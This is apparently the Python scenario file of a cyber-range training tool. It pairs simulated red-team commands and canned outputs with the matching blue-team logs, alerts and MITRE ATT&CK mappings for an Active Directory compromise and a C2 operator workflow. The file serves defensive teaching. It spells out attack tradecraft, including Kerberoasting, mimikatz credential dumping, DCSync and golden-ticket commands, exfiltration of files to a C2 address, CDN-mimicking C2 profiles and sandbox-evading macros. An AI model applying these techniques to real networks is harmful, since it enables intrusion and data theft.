"""Cyber Range — interactive red team vs blue team training scenarios.

Red team console: simulated C2-like commands generating attack actions.
Blue team panel: corresponding logs, alerts, and MITRE detections.
Trainees can play attacker, defender, or both sides simultaneously.
"""

import logging
from typing import Any

logger = logging.getLogger(__name__)

# =====================================================================
# Attack Command Registry — what the red team can "execute"
# Each command produces: red team output, blue team logs, blue team alerts
# =====================================================================

RANGE_SCENARIOS = {
    "ad-compromise": {
        "id": "ad-compromise",
        "title": "Active Directory Compromise",
        "difficulty": "advanced",
        "description": "Full kill chain: initial access via phishing, credential theft, lateral movement, domain dominance, and data exfiltration. Play as the attacker executing each stage, then switch to blue team to see what the SOC sees.",
        "estimated_minutes": 25,
        "environment": {
            "target_network": "10.20.0.0/16",
            "domain": "GUARDEDGLASS.LOCAL",
            "dc": "SRV-DC01 (10.20.1.10)",
            "file_server": "SRV-FILE01 (10.20.1.20)",
            "mail_server": "SRV-MAIL01 (10.20.1.30)",
            "workstations": ["WS-DEV03 (10.20.5.103)", "WS-FIN01 (10.20.6.10)", "WS-MKTG07 (10.20.7.55)"],
            "users": {
                "t.nguyen": {"role": "Developer", "host": "WS-DEV03", "dept": "Engineering"},
                "j.smith": {"role": "Finance Analyst", "host": "WS-FIN01", "dept": "Finance"},
                "r.chen": {"role": "Marketing Manager", "host": "WS-MKTG07", "dept": "Marketing"},
                "da_johnson": {"role": "IT Admin (Domain Admin)", "host": "SRV-JUMP01", "dept": "IT"},
            },
            "c2_server": "185.220.101.34 (Attacker C2)",
        },
        "stages": [
            {
                "id": 1,
                "name": "Initial Access",
                "tactic": "initial-access",
                "description": "Deliver a phishing email with a malicious macro document to a developer.",
                "commands": [
                    {
                        "cmd": "send-phish --target t.nguyen@guardedglass.com --template job-offer --payload macro.xlsm",
                        "description": "Send spearphishing email with malicious Excel attachment",
                        "red_output": [
                            "[*] Crafting phishing email...",
                            "[*] Template: Recruiter job offer from LinkedIn",
                            "[*] Payload: macro.xlsm (VBA macro → PowerShell download cradle)",
                            "[*] Target: t.nguyen@guardedglass.com (Developer, WS-DEV03)",
                            "[+] Email sent successfully via SMTP relay",
                            "[*] Waiting for payload execution...",
                            "",
                            "[+] CALLBACK RECEIVED from 10.20.5.103 (WS-DEV03)",
                            "[+] User t.nguyen opened macro.xlsm and enabled macros",
                            "[+] PowerShell beacon established → C2 channel active",
                        ],
                        "blue_logs": [
                            {"time": "08:23:15", "source": "Email Gateway", "level": "INFO", "msg": "Inbound email to t.nguyen@guardedglass.com from recruiter@linkedin-careers.net, attachment: Q1_Salary_Review.xlsm"},
                            {"time": "08:25:02", "source": "Endpoint/WS-DEV03", "level": "WARN", "msg": "WINWORD.EXE spawned powershell.exe (PID 4872) with -EncodedCommand flag"},
                            {"time": "08:25:03", "source": "Endpoint/WS-DEV03", "level": "WARN", "msg": "powershell.exe making outbound HTTPS connection to 185.220.101.34:443"},
                            {"time": "08:25:04", "source": "Network/Firewall", "level": "INFO", "msg": "ALLOW TCP 10.20.5.103:49721 → 185.220.101.34:443 (HTTPS)"},
                            {"time": "08:25:05", "source": "DNS", "level": "INFO", "msg": "Query: cdn-update.azureedge-cdn.com → 185.220.101.34 (suspicious: newly registered domain)"},
                        ],
                        "blue_alerts": [
                            {"title": "Suspicious Email Attachment: Macro-Enabled Document", "severity": "medium", "rule": "Email - Macro Attachment to Developer", "mitre": "T1566.001", "host": "MAIL-GW01"},
                            {"title": "Office Application Spawned PowerShell", "severity": "high", "rule": "Execution - Office Spawns Shell", "mitre": "T1059.001", "host": "WS-DEV03"},
                            {"title": "Encoded PowerShell Execution", "severity": "high", "rule": "Execution - Encoded PowerShell", "mitre": "T1059.001", "host": "WS-DEV03"},
                            {"title": "Outbound Connection to Known Tor Exit Node", "severity": "high", "rule": "C2 - Connection to Threat Intel IP", "mitre": "T1071.001", "host": "WS-DEV03"},
                        ],
                        "mitre": ["T1566.001", "T1059.001", "T1071.001"],
                        "user_view": {
                            "desktop_user": "t.nguyen",
                            "host": "WS-DEV03",
                            "events": [
                                {"type": "notification", "app": "Outlook", "icon": "mail", "title": "New Email", "detail": "From: Sarah Chen (LinkedIn Recruiter)\nSubject: Exciting Sr. Developer Opportunity — Salary Review Attached"},
                                {"type": "app_open", "app": "Microsoft Excel", "icon": "file-spreadsheet", "title": "Q1_Salary_Review.xlsm", "detail": "SECURITY WARNING: Macros have been disabled.\n[Enable Content]"},
                                {"type": "dialog", "app": "Microsoft Excel", "icon": "alert-triangle", "title": "Microsoft Excel Security Notice", "detail": "Macros have been disabled. Click 'Enable Content' to view the full document.\n\nUser clicked: Enable Content"},
                                {"type": "brief_flash", "app": "PowerShell", "icon": "terminal", "title": "", "detail": "A black command window briefly appeared and disappeared (< 1 second)"},
                                {"type": "normal", "app": "Microsoft Excel", "icon": "file-spreadsheet", "title": "Q1_Salary_Review.xlsm", "detail": "The spreadsheet appears to load normally. Contains a fake salary comparison table. User continues working — unaware that a beacon is now active."},
                            ],
                        },
                    },
                ],
            },
            {
                "id": 2,
                "name": "Discovery & Credential Access",
                "tactic": "credential-access",
                "description": "Enumerate the domain and steal credentials from the compromised workstation.",
                "commands": [
                    {
                        "cmd": "shell whoami /all && net user /domain && nltest /dclist:guardedglass.local",
                        "description": "Domain enumeration — identify users, groups, domain controllers",
                        "red_output": [
                            "[*] Executing domain enumeration on WS-DEV03...",
                            "",
                            "GUARDEDGLASS\\t.nguyen",
                            "  Groups: Domain Users, Developers, VPN-Users",
                            "",
                            "Domain Controllers:",
                            "  SRV-DC01.guardedglass.local (PDC) [10.20.1.10]",
                            "  SRV-DC02.guardedglass.local       [10.20.1.11]",
                            "",
                            "Domain Admins: da_johnson, svc_sccm, Administrator",
                            "[+] Identified 847 domain users, 2 DCs, 3 domain admin accounts",
                        ],
                        "blue_logs": [
                            {"time": "08:31:10", "source": "Endpoint/WS-DEV03", "level": "INFO", "msg": "Process: powershell.exe executed 'whoami /all' (PID 4872)"},
                            {"time": "08:31:11", "source": "DC/SRV-DC01", "level": "INFO", "msg": "LDAP query from 10.20.5.103: (&(objectClass=user)) — enumerating all domain users"},
                            {"time": "08:31:12", "source": "DC/SRV-DC01", "level": "INFO", "msg": "LDAP query from 10.20.5.103: (&(objectClass=group)(cn=Domain Admins))"},
                        ],
                        "blue_alerts": [
                            {"title": "Suspicious LDAP Enumeration from Workstation", "severity": "medium", "rule": "Discovery - Bulk LDAP Queries", "mitre": "T1087.002", "host": "WS-DEV03"},
                        ],
                        "mitre": ["T1087.002", "T1069.002", "T1018"],
                        "user_view": {
                            "desktop_user": "t.nguyen",
                            "host": "WS-DEV03",
                            "events": [
                                {"type": "normal", "app": "Desktop", "icon": "monitor", "title": "Normal Operation", "detail": "User t.nguyen is working in VS Code editing Python files. Nothing visible on screen — all enumeration happens silently in the background via the beacon process."},
                            ],
                        },
                    },
                    {
                        "cmd": "execute-assembly Rubeus.exe kerberoast /outfile:hashes.txt",
                        "description": "Kerberoast — request TGS tickets for service accounts, crack offline",
                        "red_output": [
                            "[*] Loading Rubeus.exe into memory via execute-assembly...",
                            "[*] Targeting service accounts with SPNs...",
                            "",
                            "[+] Found 23 accounts with SPNs",
                            "[+] Requesting RC4 TGS tickets...",
                            "  MSSQLSvc/SQL01.gg.local:1433     — svc_sql (RC4_HMAC)",
                            "  HTTP/intranet.gg.local            — svc_iis (RC4_HMAC)",
                            "  CIFS/SRV-FILE01.gg.local          — svc_backup (RC4_HMAC)",
                            "  MSSQLSvc/SQL02.gg.local:1433     — svc_reporting (RC4_HMAC)",
                            "  ... 19 more",
                            "",
                            "[+] 23 TGS tickets saved to hashes.txt",
                            "[*] Cracking with hashcat...",
                            "[+] svc_backup : Summer2024!  (cracked in 3 seconds)",
                            "[+] svc_sql    : SqlSvc#2023  (cracked in 47 seconds)",
                        ],
                        "blue_logs": [
                            {"time": "08:35:00", "source": "DC/SRV-DC01", "level": "WARN", "msg": "Event 4769: 23 TGS requests from 10.20.5.103 in 4 minutes (etype 0x17 RC4) — anomalous volume"},
                            {"time": "08:35:01", "source": "DC/SRV-DC01", "level": "INFO", "msg": "Event 4769: TGS request for MSSQLSvc/SQL01 from t.nguyen@GUARDEDGLASS (RC4)"},
                            {"time": "08:35:02", "source": "DC/SRV-DC01", "level": "INFO", "msg": "Event 4769: TGS request for HTTP/intranet from t.nguyen@GUARDEDGLASS (RC4)"},
                        ],
                        "blue_alerts": [
                            {"title": "Kerberoasting: Excessive TGS Requests with RC4", "severity": "high", "rule": "Credential Access - Kerberoasting", "mitre": "T1558.003", "host": "WS-DEV03"},
                            {"title": "RC4 Encryption Requested (Downgrade Attack)", "severity": "medium", "rule": "Credential Access - Kerberos RC4 Downgrade", "mitre": "T1558.003", "host": "SRV-DC01"},
                        ],
                        "mitre": ["T1558.003"],
                        "user_view": {
                            "desktop_user": "t.nguyen",
                            "host": "WS-DEV03",
                            "events": [
                                {"type": "normal", "app": "Desktop", "icon": "monitor", "title": "Normal Operation", "detail": "User still working normally. Rubeus runs entirely in memory via the beacon — no files written to disk, no visible windows. The 23 Kerberos ticket requests happen at the protocol level, invisible to the user."},
                            ],
                        },
                    },
                ],
            },
            {
                "id": 3,
                "name": "Lateral Movement",
                "tactic": "lateral-movement",
                "description": "Use stolen service account credentials to move to the file server and domain controller.",
                "commands": [
                    {
                        "cmd": "psexec svc_backup@10.20.1.20 cmd.exe",
                        "description": "Lateral movement to file server via PsExec using cracked service account",
                        "red_output": [
                            "[*] Attempting PsExec to SRV-FILE01 (10.20.1.20) as svc_backup...",
                            "[*] Connecting to ADMIN$ share...",
                            "[+] Service PSEXESVC installed on SRV-FILE01",
                            "[+] Shell established!",
                            "",
                            "C:\\Windows\\system32> hostname",
                            "SRV-FILE01",
                            "C:\\Windows\\system32> whoami",
                            "GUARDEDGLASS\\svc_backup",
                            "",
                            "[+] Pivot established: WS-DEV03 → SRV-FILE01",
                        ],
                        "blue_logs": [
                            {"time": "08:42:30", "source": "Endpoint/SRV-FILE01", "level": "WARN", "msg": "Event 7045: New service installed: PSEXESVC (\\\\SRV-FILE01\\ADMIN$\\psexesvc.exe)"},
                            {"time": "08:42:31", "source": "Endpoint/SRV-FILE01", "level": "WARN", "msg": "Event 4624: Logon Type 3 (Network) for svc_backup from 10.20.5.103"},
                            {"time": "08:42:32", "source": "Network/Firewall", "level": "INFO", "msg": "ALLOW TCP 10.20.5.103 → 10.20.1.20:445 (SMB)"},
                        ],
                        "blue_alerts": [
                            {"title": "PsExec Service Installation on Server", "severity": "high", "rule": "Lateral Movement - PsExec", "mitre": "T1569.002", "host": "SRV-FILE01"},
                            {"title": "Service Account Interactive Logon (Unusual)", "severity": "medium", "rule": "Lateral Movement - Service Account Logon", "mitre": "T1078.002", "host": "SRV-FILE01"},
                        ],
                        "mitre": ["T1569.002", "T1021.002", "T1078.002"],
                        "user_view": {
                            "desktop_user": "Backup Service",
                            "host": "SRV-FILE01",
                            "events": [
                                {"type": "notification", "app": "Windows Services", "icon": "settings", "title": "New Service Installed", "detail": "Service 'PSEXESVC' was installed and started.\n(Normally invisible — only appears in Event Viewer)"},
                                {"type": "normal", "app": "Server Desktop", "icon": "server", "title": "No Interactive User", "detail": "SRV-FILE01 is a file server with no interactive desktop sessions. The PsExec service installation and command execution happen entirely in the background. No user would see anything."},
                            ],
                        },
                    },
                    {
                        "cmd": "mimikatz sekurlsa::logonpasswords",
                        "description": "Dump credentials from file server memory — harvest domain admin tokens",
                        "red_output": [
                            "[*] Loading mimikatz on SRV-FILE01...",
                            "",
                            "mimikatz # sekurlsa::logonpasswords",
                            "",
                            "Authentication Id : 0 ; 996 (00000000:000003e4)",
                            "Session           : Service from 0",
                            "User Name         : svc_backup",
                            "Domain            : GUARDEDGLASS",
                            "NTLM              : a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4",
                            "",
                            "Authentication Id : 0 ; 43921847",
                            "Session           : Interactive from 2",
                            "User Name         : da_johnson",
                            "Domain            : GUARDEDGLASS",
                            "NTLM              : 9f8e7d6c5b4a39281706f5e4d3c2b1a0",
                            "",
                            "[+] DOMAIN ADMIN CREDENTIALS HARVESTED: da_johnson",
                            "[+] NTLM hash captured — can be used for pass-the-hash",
                        ],
                        "blue_logs": [
                            {"time": "08:45:10", "source": "Endpoint/SRV-FILE01", "level": "CRIT", "msg": "Process cmd.exe (PID 2104) accessed lsass.exe with PROCESS_VM_READ — credential dumping detected"},
                            {"time": "08:45:11", "source": "Endpoint/SRV-FILE01", "level": "WARN", "msg": "Suspicious module loaded: mimikatz.exe (SHA256: aabbcc...) — known credential theft tool"},
                        ],
                        "blue_alerts": [
                            {"title": "LSASS Memory Access by Non-System Process", "severity": "critical", "rule": "Credential Access - LSASS Dump", "mitre": "T1003.001", "host": "SRV-FILE01"},
                            {"title": "Known Attack Tool Detected: Mimikatz", "severity": "critical", "rule": "Execution - Known Attack Tool", "mitre": "T1003.001", "host": "SRV-FILE01"},
                        ],
                        "mitre": ["T1003.001"],
                        "user_view": {
                            "desktop_user": "Backup Service",
                            "host": "SRV-FILE01",
                            "events": [
                                {"type": "normal", "app": "Server Desktop", "icon": "server", "title": "No Visible Activity", "detail": "Mimikatz runs in memory via the PsExec session. It reads LSASS process memory to extract cached credentials. There are no visible windows, no prompts, no CPU spike noticeable by any logged-in admin."},
                                {"type": "info", "app": "Key Insight", "icon": "info", "title": "Why This Is Dangerous", "detail": "da_johnson (Domain Admin) previously RDP'd into this server for maintenance. Their credentials are still cached in LSASS memory — even though they logged off hours ago. This is why admin credential hygiene and tiered access (PAW) matter."},
                            ],
                        },
                    },
                ],
            },
            {
                "id": 4,
                "name": "Domain Dominance",
                "tactic": "persistence",
                "description": "Use domain admin credentials to perform DCSync and create a Golden Ticket for persistent access.",
                "commands": [
                    {
                        "cmd": "dcsync guardedglass.local /user:krbtgt",
                        "description": "DCSync — extract KRBTGT hash to forge Golden Tickets",
                        "red_output": [
                            "[*] Performing DCSync against SRV-DC01 as da_johnson...",
                            "[*] Requesting replication of krbtgt account...",
                            "",
                            "Object RDN           : krbtgt",
                            "SAM Username          : krbtgt",
                            "User Principal Name   : krbtgt@guardedglass.local",
                            "Object Security ID    : S-1-5-21-...-502",
                            "",
                            "Hash NTLM: e4f7c5b3a29187d6c0e4f7c5b3a29187",
                            "",
                            "[+] KRBTGT HASH EXTRACTED",
                            "[+] Can now forge Golden Tickets for ANY user",
                            "[+] Domain is fully compromised",
                        ],
                        "blue_logs": [
                            {"time": "08:50:00", "source": "DC/SRV-DC01", "level": "CRIT", "msg": "Event 4662: DS-Replication-Get-Changes-All requested by da_johnson from 10.20.1.20 (NOT a Domain Controller)"},
                            {"time": "08:50:01", "source": "DC/SRV-DC01", "level": "CRIT", "msg": "DRS GetNCChanges request for DC=guardedglass,DC=local from non-DC host SRV-FILE01"},
                        ],
                        "blue_alerts": [
                            {"title": "DCSync: Domain Replication from Non-DC Host", "severity": "critical", "rule": "Credential Access - DCSync", "mitre": "T1003.006", "host": "SRV-DC01"},
                            {"title": "Replicating Directory Changes All — Suspicious Source", "severity": "critical", "rule": "Persistence - KRBTGT Extraction", "mitre": "T1003.006", "host": "SRV-DC01"},
                        ],
                        "mitre": ["T1003.006"],
                        "user_view": {
                            "desktop_user": "da_johnson",
                            "host": "SRV-JUMP01",
                            "events": [
                                {"type": "normal", "app": "Server Desktop", "icon": "server", "title": "No Visible Activity", "detail": "DCSync uses the standard Active Directory replication protocol. From the network's perspective, it looks like normal DC-to-DC replication traffic. No visible windows or prompts on any machine."},
                                {"type": "info", "app": "Key Insight", "icon": "info", "title": "The Silent Domain Theft", "detail": "The attacker just downloaded EVERY password hash in Active Directory — all 847 user accounts, all service accounts, the KRBTGT key. This all happened via a single network request that looks like normal AD replication. No alarms on any desktop."},
                            ],
                        },
                    },
                    {
                        "cmd": "golden_ticket /domain:guardedglass.local /sid:S-1-5-21-... /krbtgt:e4f7c5b3a29187d6c0e4f7c5b3a29187 /user:Administrator /ptt",
                        "description": "Forge a Golden Ticket for the Administrator account with 10-year lifetime",
                        "red_output": [
                            "[*] Forging Golden Ticket...",
                            "  Domain      : guardedglass.local",
                            "  SID         : S-1-5-21-...",
                            "  User        : Administrator",
                            "  KRBTGT NTLM : e4f7c5b3a29187d6c0e4f7c5b3a29187",
                            "  Lifetime    : 10 years",
                            "",
                            "[+] Golden Ticket created and injected into current session",
                            "[+] Now operating as: GUARDEDGLASS\\Administrator",
                            "[+] PERSISTENCE ESTABLISHED — this ticket survives password resets",
                        ],
                        "blue_logs": [
                            {"time": "08:52:00", "source": "DC/SRV-DC01", "level": "WARN", "msg": "Event 4769: TGS request from SRV-FILE01 for CIFS/SRV-DC01 — NO corresponding AS-REQ in last 48h"},
                            {"time": "08:52:01", "source": "DC/SRV-DC01", "level": "CRIT", "msg": "Anomalous TGT detected: lifetime 87600 hours (default: 10h), issuer: UNKNOWN"},
                        ],
                        "blue_alerts": [
                            {"title": "Golden Ticket: TGS Without Prior Authentication", "severity": "critical", "rule": "Persistence - Golden Ticket", "mitre": "T1558.001", "host": "SRV-DC01"},
                        ],
                        "mitre": ["T1558.001"],
                        "user_view": {
                            "desktop_user": "da_johnson",
                            "host": "SRV-JUMP01",
                            "events": [
                                {"type": "normal", "app": "Server Desktop", "icon": "server", "title": "Completely Invisible", "detail": "A Golden Ticket is forged entirely in the attacker's memory. No files, no network traffic to create it. Once injected, the attacker appears to be a legitimate Domain Admin to every system in the network."},
                                {"type": "warning", "app": "Key Insight", "icon": "alert-triangle", "title": "Persistence Achieved", "detail": "The attacker now has a ticket valid for 10 YEARS. Even if da_johnson's password is reset, the Golden Ticket still works. Only resetting the KRBTGT password TWICE will invalidate it. Most organizations never do this."},
                            ],
                        },
                    },
                ],
            },
            {
                "id": 5,
                "name": "Exfiltration",
                "tactic": "exfiltration",
                "description": "Access sensitive file shares and exfiltrate data via encrypted C2 channel.",
                "commands": [
                    {
                        "cmd": "ls \\\\SRV-FILE01\\Finance$ && download \\\\SRV-FILE01\\Finance$\\Q1-2026-Results.xlsx",
                        "description": "Access restricted finance share and exfiltrate sensitive documents",
                        "red_output": [
                            "[*] Accessing \\\\SRV-FILE01\\Finance$ as Administrator...",
                            "",
                            " Directory of \\\\SRV-FILE01\\Finance$",
                            "",
                            " 04/01/2026  09:14    <DIR>    Payroll",
                            " 04/03/2026  16:22    <DIR>    Board-Reports",
                            " 04/05/2026  11:30    4,521,088    Q1-2026-Results.xlsx",
                            " 04/05/2026  14:18    2,847,744    M&A-Draft-Confidential.docx",
                            " 04/06/2026  08:44    1,203,456    Employee-Salary-Database.csv",
                            "",
                            "[*] Downloading Q1-2026-Results.xlsx (4.3MB)...",
                            "[*] Downloading M&A-Draft-Confidential.docx (2.7MB)...",
                            "[*] Downloading Employee-Salary-Database.csv (1.1MB)...",
                            "[+] 3 files exfiltrated via HTTPS C2 channel (8.1MB total)",
                            "",
                            "[+] OBJECTIVE COMPLETE: Sensitive financial data exfiltrated",
                        ],
                        "blue_logs": [
                            {"time": "08:55:00", "source": "Network/Firewall", "level": "INFO", "msg": "Large outbound transfer: 10.20.1.20 → 185.220.101.34:443, 8.3MB in 12 seconds"},
                            {"time": "08:55:01", "source": "Endpoint/SRV-FILE01", "level": "WARN", "msg": "Event 5145: Share access \\\\SRV-FILE01\\Finance$ by GUARDEDGLASS\\Administrator from SRV-FILE01 (unusual — admin doesn't normally access Finance$)"},
                            {"time": "08:55:02", "source": "DLP", "level": "CRIT", "msg": "Sensitive file access pattern: 3 files containing PII/financial data accessed in rapid succession"},
                        ],
                        "blue_alerts": [
                            {"title": "Unusual Admin Access to Restricted File Share", "severity": "high", "rule": "Collection - Sensitive Share Access", "mitre": "T1039", "host": "SRV-FILE01"},
                            {"title": "Large Outbound Data Transfer to External IP", "severity": "high", "rule": "Exfiltration - Large Transfer", "mitre": "T1041", "host": "SRV-FILE01"},
                            {"title": "Data Loss Prevention: Bulk PII/Financial File Access", "severity": "critical", "rule": "Exfiltration - DLP Trigger", "mitre": "T1005", "host": "SRV-FILE01"},
                        ],
                        "mitre": ["T1039", "T1041", "T1005"],
                        "user_view": {
                            "desktop_user": "j.smith",
                            "host": "WS-FIN01",
                            "events": [
                                {"type": "normal", "app": "Desktop", "icon": "monitor", "title": "Finance Team Unaware", "detail": "j.smith in Finance is working normally at WS-FIN01. They have no idea that the Finance$ share on SRV-FILE01 is being accessed remotely. The files are being read and exfiltrated — not modified or deleted — so no file-in-use warnings appear."},
                                {"type": "notification", "app": "Windows Explorer", "icon": "folder", "title": "No File Locks Visible", "detail": "The attacker is using Administrator credentials to read files via SMB. From j.smith's perspective, the shared drive works normally. Opened files show no conflicts."},
                                {"type": "warning", "app": "Key Insight", "icon": "alert-triangle", "title": "The Invisible Theft", "detail": "8.1MB of confidential financial data — quarterly results, M&A drafts, employee salary database — just left the network via the attacker's encrypted C2 channel. No pop-ups, no warnings, no download dialogs. The DLP system caught it, but would anyone be watching in real-time?"},
                            ],
                        },
                    },
                ],
            },
        ],
    },

    "c2-operations": {
        "id": "c2-operations",
        "title": "C2 Operations — Full Operator Workflow",
        "difficulty": "advanced",
        "description": "Complete C2 framework operator training: team server setup, malleable C2 profile, listener configuration, payload generation, initial access delivery, beacon management, and post-exploitation. See every step from the operator's console and the corresponding blue team detections.",
        "estimated_minutes": 35,
        "environment": {
            "target_network": "10.20.0.0/16",
            "domain": "GUARDEDGLASS.LOCAL",
            "dc": "SRV-DC01 (10.20.1.10)",
            "file_server": "SRV-FILE01 (10.20.1.20)",
            "mail_server": "SRV-MAIL01 (10.20.1.30)",
            "workstations": ["WS-DEV03 (10.20.5.103)", "WS-FIN01 (10.20.6.10)", "WS-HR02 (10.20.6.22)"],
            "users": {
                "t.nguyen": {"role": "Developer", "host": "WS-DEV03", "dept": "Engineering"},
                "j.smith": {"role": "Finance Analyst", "host": "WS-FIN01", "dept": "Finance"},
                "a.patel": {"role": "HR Manager", "host": "WS-HR02", "dept": "Human Resources"},
            },
            "c2_server": "185.220.101.34 (Attacker VPS — Ubuntu 22.04)",
        },
        "stages": [
            {
                "id": 1,
                "name": "Team Server Setup",
                "tactic": "resource-development",
                "description": "Configure the C2 team server, create a malleable C2 profile to evade network detection, and start listeners.",
                "commands": [
                    {
                        "cmd": "./teamserver 185.220.101.34 Str0ngP@ss! c2-profiles/amazon_cdn.profile",
                        "description": "Start the C2 team server with a malleable profile that mimics Amazon CDN traffic",
                        "red_output": [
                            "[*] Starting Team Server...",
                            "[*] Loading malleable C2 profile: amazon_cdn.profile",
                            "",
                            "    Profile Analysis:",
                            "    ├── User-Agent: Amazon CloudFront",
                            "    ├── HTTP GET:  /cdn/assets/__data?ref=<bid>&fmt=js",
                            "    ├── HTTP POST: /api/v2/telemetry/submit",
                            "    ├── Jitter:    37%",
                            "    ├── Sleep:     60s (will look like periodic CDN polling)",
                            "    ├── Host Header: d1234abcdef.cloudfront.net",
                            "    ├── SSL Cert:  Let's Encrypt (auto-generated, looks legitimate)",
                            "    └── Pipe Name:  \\\\.\\.\\pipe\\msagent_##  (named pipe for SMB beacons)",
                            "",
                            "[+] Malleable profile loaded — traffic will mimic Amazon CDN requests",
                            "[+] Team Server started on 185.220.101.34:50050",
                            "[+] SHA256 hash of SSL cert: a1b2c3d4e5f6...",
                        ],
                        "blue_logs": [],
                        "blue_alerts": [],
                        "mitre": ["T1583.004", "T1588.004"],
                        "user_view": {
                            "desktop_user": "—",
                            "host": "Attacker VPS",
                            "events": [
                                {"type": "info", "app": "Key Insight", "icon": "info", "title": "What is a Team Server?", "detail": "The team server is the central C2 infrastructure. Multiple operators can connect to it simultaneously. The malleable C2 profile defines how beacon traffic looks on the wire — in this case, mimicking Amazon CDN to blend in with normal web traffic."},
                                {"type": "warning", "app": "Detection Opportunity", "icon": "alert-triangle", "title": "How Blue Team Can Detect This", "detail": "At this stage, the team server is set up on the attacker's infrastructure. The blue team can't see anything yet. However, proactive threat hunting can look for: newly registered domains, SSL certificates from suspicious providers, IP reputation on threat intel feeds."},
                            ],
                        },
                    },
                    {
                        "cmd": "listener> create https --host d1234abcdef.cloudfront.net --port 443 --profile amazon_cdn",
                        "description": "Create an HTTPS listener that uses the Amazon CDN malleable profile",
                        "red_output": [
                            "[*] Creating HTTPS listener...",
                            "",
                            "    Listener Configuration:",
                            "    ├── Name:      cdn-https",
                            "    ├── Type:      HTTPS (TLS 1.3)",
                            "    ├── Host:      d1234abcdef.cloudfront.net",
                            "    ├── Port:      443",
                            "    ├── Bind IP:   0.0.0.0",
                            "    ├── Profile:   amazon_cdn",
                            "    ├── C2 URLs:   /cdn/assets/__data (GET), /api/v2/telemetry/submit (POST)",
                            "    └── Staging:   DISABLED (stageless payloads only — harder to detect)",
                            "",
                            "[+] Listener 'cdn-https' started on 0.0.0.0:443",
                            "[+] Beacon will callback to: https://d1234abcdef.cloudfront.net/cdn/assets/__data",
                        ],
                        "blue_logs": [],
                        "blue_alerts": [],
                        "mitre": ["T1071.001", "T1573.002"],
                        "user_view": {
                            "desktop_user": "—",
                            "host": "Attacker VPS",
                            "events": [
                                {"type": "info", "app": "Key Insight", "icon": "info", "title": "Why Stageless?", "detail": "Stageless payloads embed the full beacon in the initial payload — no second download stage. This avoids the 'stager' network callback that many EDR/IDS products detect. The tradeoff: larger payload size (~300KB vs ~15KB staged)."},
                                {"type": "info", "app": "Key Insight", "icon": "info", "title": "The Fake CDN Domain", "detail": "d1234abcdef.cloudfront.net looks like a legitimate Amazon CloudFront CDN domain. In a real operation, the attacker would use domain fronting or register a lookalike domain. The SOC's proxy logs would show what appears to be normal CDN traffic."},
                            ],
                        },
                    },
                ],
            },
            {
                "id": 2,
                "name": "Payload Generation",
                "tactic": "resource-development",
                "description": "Generate payloads in multiple formats for different delivery methods.",
                "commands": [
                    {
                        "cmd": "generate> payload --listener cdn-https --format raw --output beacon.bin\ngenerate> payload --listener cdn-https --format exe --output update.exe --sign --icon word.ico\ngenerate> payload --listener cdn-https --format vba --output macro.vba",
                        "description": "Generate stageless payloads: raw shellcode, signed EXE disguised as Word, and VBA macro",
                        "red_output": [
                            "[*] Generating payloads for listener 'cdn-https'...",
                            "",
                            "    Payload 1: Raw Shellcode",
                            "    ├── Format:    .bin (position-independent shellcode)",
                            "    ├── Size:      289,792 bytes",
                            "    ├── Arch:      x64",
                            "    ├── Encoding:  XOR with random key (evades static signatures)",
                            "    └── Output:    beacon.bin",
                            "",
                            "    Payload 2: Signed Executable",
                            "    ├── Format:    .exe (PE32+)",
                            "    ├── Size:      312,064 bytes",
                            "    ├── Signed:    YES (code-signing cert from Sectigo)",
                            "    ├── Icon:      Microsoft Word icon (disguise)",
                            "    ├── Metadata:  'Microsoft Word Processor' / 'Microsoft Corporation'",
                            "    ├── AV Evasion: sleep obfuscation, direct syscalls, unhooking",
                            "    └── Output:    update.exe",
                            "",
                            "    Payload 3: VBA Macro",
                            "    ├── Format:    .vba (for embedding in Office documents)",
                            "    ├── Technique: WMI process creation (no direct child process)",
                            "    ├── Sandbox Evasion: check mouse movement, domain join, RAM > 4GB",
                            "    ├── Obfuscation: string concatenation, VBA stomping",
                            "    └── Output:    macro.vba",
                            "",
                            "[+] 3 payloads generated",
                            "[+] SHA256(update.exe): 7a8b9c0d1e2f...",
                            "[+] SHA256(beacon.bin): 4d5e6f708192...",
                        ],
                        "blue_logs": [],
                        "blue_alerts": [],
                        "mitre": ["T1587.001", "T1588.003", "T1553.002"],
                        "user_view": {
                            "desktop_user": "—",
                            "host": "Attacker VPS",
                            "events": [
                                {"type": "info", "app": "Key Insight", "icon": "info", "title": "Code Signing", "detail": "The EXE is signed with a legitimate code-signing certificate. Attackers buy these from resellers or steal them. Windows SmartScreen and many EDR products give signed binaries more trust — potentially bypassing execution blocks."},
                                {"type": "info", "app": "Key Insight", "icon": "info", "title": "Sandbox Evasion in the Macro", "detail": "The VBA macro checks: Is a mouse connected? Is the machine domain-joined? Does it have > 4GB RAM? If any check fails, the macro does nothing — because it's likely running in a malware sandbox, not a real user's machine."},
                                {"type": "warning", "app": "Detection Opportunity", "icon": "alert-triangle", "title": "How to Detect These Payloads", "detail": "1) Macro: detect Office spawning WMI/PowerShell (Sysmon Event 1)\n2) EXE: check code-signing cert against known-bad cert lists\n3) Both: monitor for sleep obfuscation patterns (API stomping, timer manipulation)\n4) Network: JA3/JA3S TLS fingerprinting may flag the beacon's TLS handshake"},
                            ],
                        },
                    },
                ],
            },
            {
                "id": 3,
                "name": "Initial Access — Delivery",
                "tactic": "initial-access",
                "description": "Deliver the payload via a spearphishing email with the VBA macro embedded in an Excel document.",
                "commands": [
                    {
                        "cmd": "deliver> spearphish --target a.patel@guardedglass.com --from hr-benefits@guardedglass-benefits.com --subject 'Updated Benefits Package 2026' --attachment Benefits_2026.xlsm --embed macro.vba",
                        "description": "Send phishing email to HR manager with macro-embedded Excel",
                        "red_output": [
                            "[*] Preparing spearphishing delivery...",
                            "",
                            "    Email Configuration:",
                            "    ├── From:       hr-benefits@guardedglass-benefits.com (typosquat)",
                            "    ├── To:         a.patel@guardedglass.com (HR Manager)",
                            "    ├── Subject:    Updated Benefits Package 2026",
                            "    ├── Body:       'Hi Anita, please review the updated benefits...'",
                            "    ├── Attachment:  Benefits_2026.xlsm (with embedded VBA payload)",
                            "    ├── Macro trigger: Document_Open + WMI spawn",
                            "    └── Reply-To:   benefits-team@guardedglass-benefits.com",
                            "",
                            "[*] Email sent via SMTP relay...",
                            "[*] Waiting for callback...",
                            "",
                            "  ██████████░░░░░░░░░░ 50% — Email delivered, waiting for open...",
                            "  ████████████████░░░░ 80% — Document opened...",
                            "  ████████████████████ 100% — Macros enabled!",
                            "",
                            "[+] BEACON CALLBACK: 10.20.6.22 (WS-HR02)",
